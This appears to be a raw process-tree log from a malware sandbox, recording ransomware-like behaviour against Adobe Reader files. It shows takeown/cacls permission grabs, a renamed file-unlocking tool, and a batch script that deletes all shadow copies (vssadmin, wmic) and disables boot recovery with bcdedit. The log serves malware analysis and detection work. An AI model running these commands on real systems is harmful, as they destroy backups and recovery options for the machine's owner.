C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:804
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:1552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SY______.PFM" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:1456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:240
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "can129.hsp" -nobanner3⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "can129.hsp" -nobanner4⤵PID:1932
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:1636
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {79EDA7FD-FA01-46AA-93FE-D7FC41E7E7DC} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]1⤵PID:1036
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\TXwnHQzY.bat"2⤵PID:800
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1912
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1076
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:980
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1648
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:976
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "916912074-132860101820674401282009199105912037938712709874741940412059385557"1⤵PID:1736